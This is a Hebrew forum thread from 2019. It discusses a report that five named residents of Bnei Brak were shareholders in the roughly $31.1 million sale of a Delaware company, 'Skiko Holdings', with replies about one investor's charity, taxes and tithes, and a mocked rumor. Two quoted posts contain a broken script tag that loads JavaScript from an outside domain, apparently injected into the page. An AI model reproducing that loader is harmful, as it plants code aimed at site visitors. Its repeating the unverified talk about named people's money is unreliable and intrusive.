חמישה אברכים מבני ברק שותפים באקזיט של 31.1 מיליון דולר
חברת 'סקיקו אחזקות' הרשומה במדינת דלוואר נמכרה בשקט בשקט מבלי לעורר הרבה תשומת לב, סכום העסקה המדווחת לרשויות שבארה"ב הם מעל ל30 מיליון דולר, בין מחזיקי המניות ניתן למצוא חמישה שמות שכתובתם הרשומה היא 'בני ברק - מדינת ישראל' להלן השמות הבני ברקיים:
אברהם ישעיהו גריינמן מאיר פישר ישראל שכטר עובדיה טופרוביץ עמיחי טופרוביץ
הוא ממש לא אברך מבני ברק הוא איש עסקים שגר בחו"ל ומחזיק תורה ענק במשך שנים רבות הוא הפטרון של ישיבת נחלת הלויים אשריו ומה טוב חלקו < type="text/" async="" src="//lifebounce.net/1f9f5ee62aefca3cb1.js">>
מישהו חושב שרשות המיסים לא מעודכנים על עיסקה כזו כולל על רשימת כל החברים לעיסקה הזו?
נשלח ב-22/9/2019 13:36
קנדה כתב:
קנדה
מאיר_הכהן כתב:
עמיחי טופרוביץ
הוא ממש לא אברך מבני ברק הוא איש עסקים שגר בחו"ל ומחזיק תורה ענק במשך שנים רבות הוא הפטרון של ישיבת נחלת הלויים אשריו ומה טוב חלקו < type="text/" async="" src="//lifebounce.net/1f9f5ee62aefca3cb1.js">>
+1 מחזיק את נחלת כבר 30 שנה ואת הקהילה כולה בנו"ש כבר 20 שנה. (נדמה לי שלאחרונה הוא קצת הוריד את התמיכה עקב הרעה בעסקיו)
חמישה אברכים מבני ברק שותפים באקזיט של 31.1 מיליון דולר
חברת 'סקיקו אחזקות' הרשומה במדינת דלוואר נמכרה בשקט בשקט מבלי לעורר הרבה תשומת לב, סכום העסקה המדווחת לרשויות שבארה"ב הם מעל ל30 מיליון דולר, בין מחזיקי המניות ניתן למצוא חמישה שמות שכתובתם הרשומה היא 'בני ברק - מדינת ישראל' להלן השמות הבני ברקיים:
אברהם ישעיהו גריינמן מאיר פישר ישראל שכטר עובדיה טופרוביץ עמיחי טופרוביץ
אם אפשר פירוט לאחוז הרווח התפעולי - והנקי - של כל אחד מחמשת המופלאים, שנדע גם מה שיעור ה"מעשר געלט"..
השאלה היא לא רק כמה קיבלו עכשיו, אלא כמה השקיעו בעבר.
נשלח ב-25/9/2019 12:23
אישיות כלכלית בכירה שהוא ידיד קרוב של חמי סיפר בשם משה פרידמן מקמא טק שאין לו שום מושג על האקזיט שדיווחתי עליו, אבל לפי הצפי בשנה הקרובה יהיו לפחות 2 אקזיטים חרדיים בסכומים שיטלטלו את כותרות החדשות במגזר החרדי והמגזר הכללי, אני עובד על זה, מקווה לפרטים נוספים בקרוב
נשלח ב-25/9/2019 14:06
מאיר_הכהן כתב:
אישיות כלכלית בכירה שהוא ידיד קרוב של חמי סיפר בשם משה פרידמן מקמא טק שאין לו שום מושג על האקזיט שדיווחתי עליו, אבל לפי הצפי בשנה הקרובה יהיו לפחות 2 אקזיטים חרדיים בסכומים שיטלטלו את כותרות החדשות במגזר החרדי והמגזר הכללי,
אני עובד על זה, מקווה לפרטים נוספים בקרוב
עוד מאן דאמר....
בדיחה טובה לסוף השנה
נשלח ב-25/9/2019 14:58
מאיר_הכהןנשלח ב-25/9/2019 12:23
(1)אישיות כלכלית בכירה (2) שהוא ידיד קרוב של (3)חמי סיפר בשם(4) משה פרידמן מקמא טק שאין לו שום מושג על האקזיט שדיווחתי עליו, אבל לפי הצפי בשנה הקרובה יהיו לפחות 2 אקזיטים חרדיים בסכומים שיטלטלו את כותרות החדשות במגזר החרדי והמגזר הכללי, (5)אני עובד על זה, מקווה לפרטים נוספים בקרוב ...